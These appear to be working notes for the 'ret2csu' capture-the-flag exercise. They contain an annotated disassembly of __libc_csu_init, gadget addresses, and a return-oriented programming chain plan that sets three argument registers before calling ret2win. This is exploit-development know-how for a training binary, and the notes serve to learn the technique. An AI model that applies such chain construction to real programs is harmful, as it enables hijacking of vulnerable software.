Register state required when control reaches ret2win (SysV AMD64: first three integer args in rdi, rsi, rdx; all three are full 64-bit values, so a gadget that writes only edi is not enough for rdi): 
rdi   0xdeadbeefdeadbeef
rsi   0xcafebabecafebabe
rdx   0xd00df00dd00df00d


odd gadget reported by the scanner (looks like a false positive, ignore it):
0x0000000000000a08 : retf 0xbabe   -- bytes ca be ba, i.e. part of the 0xcafebabe constant stored in the binary being decoded as code, not a real gadget


ret2win@plt: 0000000000400510

0x00000000004006a3 : pop rdi ; ret              -- carved out of the csu epilogue: the 5f byte of `41 5f` (pop r15) at 0x4006a2, then the c3 at 0x4006a4
0x00000000004006a1 : pop rsi ; pop r15 ; ret    -- likewise the 5e byte of `41 5e` (pop r14) at 0x4006a0




ret2csu:     file format elf64-x86-64


Disassembly of section .init:

Disassembly of section .plt:

Disassembly of section .text:

0000000000400640 <__libc_csu_init>:
  400640: 41 57                 push   r15
  400642: 41 56                 push   r14
  400644: 49 89 d7              mov    r15,rdx
  400647: 41 55                 push   r13
  400649: 41 54                 push   r12
  40064b: 4c 8d 25 9e 07 20 00  lea    r12,[rip+0x20079e]        # 600df0 <__frame_dummy_init_array_entry>
  400652: 55                    push   rbp
  400653: 48 8d 2d 9e 07 20 00  lea    rbp,[rip+0x20079e]        # 600df8 <__do_global_dtors_aux_fini_array_entry>
  40065a: 53                    push   rbx
  40065b: 41 89 fd              mov    r13d,edi
  40065e: 49 89 f6              mov    r14,rsi
  400661: 4c 29 e5              sub    rbp,r12
  400664: 48 83 ec 08           sub    rsp,0x8
  400668: 48 c1 fd 03           sar    rbp,0x3
  40066c: e8 5f fe ff ff        call   4004d0 <_init>
  400671: 48 85 ed              test   rbp,rbp
  400674: 74 20                 je     400696 <__libc_csu_init+0x56>
  400676: 31 db                 xor    ebx,ebx
  400678: 0f 1f 84 00 00 00 00  nop    DWORD PTR [rax+rax*1+0x0]
  40067f: 00 
 _______ gadget 1 (0x400680): rdx <- r15, rsi <- r14, edi <- r13d (upper 32 bits of rdi zeroed), then an INDIRECT call through [r12+rbx*8] -- r12+rbx*8 must point at a slot holding the callee's address, not at the callee itself
\/
  400680: 4c 89 fa              mov    rdx,r15
  400683: 4c 89 f6              mov    rsi,r14
  400686: 44 89 ef              mov    edi,r13d
  400689: 41 ff 14 dc           call   QWORD PTR [r12+rbx*8]
_________________________
  40068d: 48 83 c3 01           add    rbx,0x1
  400691: 48 39 dd              cmp    rbp,rbx
  400694: 75 ea                 jne    400680 <__libc_csu_init+0x40> 
  400696: 48 83 c4 08           add    rsp,0x8                       
_________________________
  40069a: 5b                    pop    rbx
  40069b: 5d                    pop    rbp
  40069c: 41 5c                 pop    r12
  40069e: 41 5d                 pop    r13
  4006a0: 41 5e                 pop    r14
  4006a2: 41 5f                 pop    r15
  4006a4: c3                    ret    

Disassembly of section .fini:

chain plan (x86-64 SysV): 

controlling rdx (only gadget 1 writes rdx, and it copies r15): 

gadget 2: 0x40069a  (pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret)
  rbx: 0                          <-- index into the pointer table at r12
  rbp: 1                          <-- must equal rbx+1 so `add rbx,1 / cmp rbp,rbx / jne` exits the loop after one call
  r12: 0xffffffff                 <-- placeholder for the next location: must become a pointer to a slot that CONTAINS the callee address (call [r12+rbx*8] dereferences it)
  r13: whatever I guess           <-- only r13d reaches edi, so gadget 1 can set at most a 32-bit rdi; the full 64-bit rdi needs the separate pop rdi gadget afterwards
  r14: 0xcafebabecafebabe         <-- copied into rsi by gadget 1
  r15: 0xd00df00dd00df00d         <-- copied into rdx by gadget 1

r12 must point at memory that holds the address of some harmless function (e.g. a GOT slot, or the _DYNAMIC entry that holds _init's address -- check with readelf -d), with rbx the slot index (and rbp = rbx+1); pointing r12 at the PLT stub itself would make `call [r12+rbx*8]` dereference instruction bytes as a pointer. After that call returns, the epilogue runs `add rsp,0x8` plus six pops before its `ret`, so 0x38 bytes of padding go on the stack before the next chain address.

0x00000000004004e0 : call rax   -- a call, not a ret-terminated gadget, and nothing in this chain controls rax; probably not needed

chain tail after the csu padding: 0x00000000004006a3 (pop rdi ; ret) with 0xdeadbeefdeadbeef, then 0000000000400510 (ret2win@plt); rsi and rdx were already set by gadget 1 and the PLT stub itself does not touch them.